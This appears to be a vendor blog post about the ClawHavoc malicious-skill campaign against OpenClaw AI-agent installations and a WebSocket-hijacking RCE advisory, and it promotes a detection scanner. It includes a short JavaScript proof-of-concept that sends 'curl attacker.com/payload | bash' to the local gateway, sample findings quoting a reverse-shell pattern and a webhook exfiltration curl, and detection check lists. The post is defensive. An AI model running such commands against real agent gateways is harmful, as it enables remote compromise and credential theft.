#openclaw#security-scanner#supply-chain#ai-agents#hackmyagent

341 Malicious Skills and a 1-Click RCE: Scanning OpenClaw Installations for ClawHavoc

OpenA2A Team8 min read

Originally published on opena2a.org

TL;DR: The ClawHavoc campaign planted 341 malicious skills on ClawHub. Combined with GHSA-g8p2's 1-click RCE vulnerability, OpenClaw users face credential theft, reverse shells, and persistent backdoors. We built a scanner to detect it.

npx hackmyagent secure-openclaw

The OpenClaw Problem

OpenClaw (formerly Clawdbot, Moltbot) emerged as a popular framework for building AI agents with tool access. Its skill marketplace, ClawHub, made it easy to extend agents with community-contributed capabilities.

Too easy, as it turned out.

In late 2025, security researchers discovered two overlapping threats targeting OpenClaw users:

ClawHavoc Campaign

A coordinated supply chain attack planted 341 malicious skills on ClawHub over a 6-month period. These skills appeared legitimate but contained:

  • Credential harvesters — Exfiltrating SSH keys, AWS credentials, and crypto wallets to attacker-controlled webhooks
  • Reverse shells — Establishing persistent backdoor access via netcat, bash, and Python payloads
  • ClickFix social engineering — Prompting users to paste malicious commands into their terminal
  • Typosquatting — Impersonating popular skills with near-identical names (@anthroplc instead of @anthropic)

GHSA-g8p2: 1-Click RCE via WebSocket Hijacking

A critical vulnerability in OpenClaw's gateway allowed any website to hijack the local WebSocket connection:

// Malicious website can connect to OpenClaw gateway
const ws = new WebSocket("ws://localhost:3100");
ws.send(JSON.stringify({
  action: "execute",
  skill: "shell",
  command: "curl attacker.com/payload | bash"
}));
// No authentication required. No user confirmation.

Impact: Visit a malicious website while OpenClaw is running = full system compromise. No clicks required beyond the initial page load.

Introducing secure-openclaw

We added 34 specialized security checks to HackMyAgent that scan OpenClaw installations for ClawHavoc indicators, GHSA-g8p2 misconfigurations, and other attack patterns.

# Scan your OpenClaw installation
npx hackmyagent secure-openclaw

# Or specify a custom path
npx hackmyagent secure-openclaw ~/.moltbot

# Auto-fix what can be fixed
npx hackmyagent secure-openclaw --fix

# JSON output for CI/CD
npx hackmyagent secure-openclaw --json

The scanner auto-detects common installation paths:

  • ~/.openclaw
  • ~/.moltbot
  • ~/.clawdbot

What It Detects

34 checks across 5 categories, each targeting specific attack patterns observed in the wild:

SKILL Checks (12) — Malicious skill detection

-SKILL-001: Unsigned or unverified skills
-SKILL-002: Remote code fetching (curl|bash)
-SKILL-003: Credential file access patterns
-SKILL-004: Data exfiltration via webhooks
-SKILL-005: Reverse shell patterns
-SKILL-006: ClickFix social engineering
-SKILL-007: Excessive capabilities (filesystem:*)
-SKILL-008: Typosquatting detection
-SKILL-009: Prompt injection attempts
-SKILL-010: Hidden file access
-SKILL-011: Environment variable harvesting
-SKILL-012: Obfuscated code patterns

HEARTBEAT Checks (6) — Scheduled task abuse

OpenClaw's HEARTBEAT.md files define periodic tasks. Attackers abuse these for persistence:

-HEARTBEAT-001: URLs without verification
-HEARTBEAT-002: Overly frequent intervals (<1 min)
-HEARTBEAT-003: Dangerous capabilities in cron
-HEARTBEAT-004: Network requests in background
-HEARTBEAT-005: File system writes in cron
-HEARTBEAT-006: Credential access in background

GATEWAY Checks (6) — GHSA-g8p2 vulnerability detection Auto-fixable

These checks detect the configuration flaws that enable WebSocket hijacking. 4 of 6 can be automatically fixed.

-GATEWAY-001: Bound to 0.0.0.0 -> auto-fix to 127.0.0.1
-GATEWAY-002: Missing WebSocket origin validation
-GATEWAY-003: Plaintext token -> auto-fix to env var
-GATEWAY-004: Approvals disabled -> auto-enable
-GATEWAY-005: Sandbox disabled -> auto-enable
-GATEWAY-006: Container escape risk

CONFIG Checks (6) — Insecure settings

-CONFIG-001: Disabled sandbox mode
-CONFIG-002: Disabled approval confirmations
-CONFIG-003: Plaintext tokens in config
-CONFIG-004: Overly permissive file access
-CONFIG-005: Debug mode enabled in production
-CONFIG-006: Insecure update settings

SUPPLY Checks (4) — Supply chain attacks

-SUPPLY-001: Known malicious skill hashes
-SUPPLY-002: Suspicious skill sources
-SUPPLY-003: Modified core files
-SUPPLY-004: Unexpected binary files

Auto-Remediation

Don't just detect problems — fix them. The scanner can automatically remediate gateway misconfigurations that enable GHSA-g8p2 attacks:

# Preview what will be fixed (dry run)
npx hackmyagent secure-openclaw --fix --dry-run

# Apply fixes automatically
npx hackmyagent secure-openclaw --fix

# Undo if something breaks
npx hackmyagent rollback ~/.openclaw

What Gets Fixed

  • + 0.0.0.0 -> 127.0.0.1 — Binds gateway to localhost only
  • + Token -> ${ENV_VAR} — Replaces plaintext with env reference
  • + Approvals enabled — Requires confirmation for commands
  • + Sandbox enabled — Isolates code execution

Safety Features

  • - Creates timestamped backup before changes
  • - Shows exactly what will change before applying
  • - One-command rollback if something breaks
  • - Only fixes safe, reversible configurations

Example Output

Running against a compromised installation:

$ npx hackmyagent secure-openclaw ~/.moltbot

OpenClaw Security Report

Target: /Users/dev/.moltbot
Risk Level: CRITICAL

CRITICAL FINDINGS (3)

[SKILL-005] Reverse shell pattern detected
  File: skills/helper-utils/SKILL.md
  Line: 42
  Pattern: bash -i >& /dev/tcp/
  Remediation: Remove this skill immediately

[SKILL-004] Data exfiltration via webhook
  File: skills/sync-helper/SKILL.md
  Line: 28
  Pattern: curl -X POST https://webhook.site/...
  Remediation: Verify destination; remove if unauthorized

[GATEWAY-001] Gateway bound to 0.0.0.0
  File: openclaw.json
  Config: "host": "0.0.0.0"
  Remediation: Bind to 127.0.0.1 for local-only access

HIGH FINDINGS (5)
...

Summary: 3 critical, 5 high, 12 medium, 4 low
Exit code: 1 (failures detected)

The Bigger Picture

ClawHavoc and GHSA-g8p2 are symptoms of a deeper problem: AI agents are granted extensive system access without adequate identity verification, capability restrictions, or behavioral monitoring.

Scanning for known-bad patterns is necessary but insufficient. To properly secure AI agents, you need:

  • Cryptographic identity — Agents prove who they are, not just claim it
  • Capability-based access control — Agents can only do what they're explicitly authorized to do
  • Continuous trust evaluation — Behavioral anomalies trigger alerts and restrictions
  • Complete audit trails — Every action logged and attributable

That's what we're building with AIM (Agent Identity Management).

Scan Your OpenClaw Installation

34 security checks. One command. Free and open source.

npx hackmyagent secure-openclawView on GitHub

© 2026 OpenA2A. Open source under Apache-2.0 License.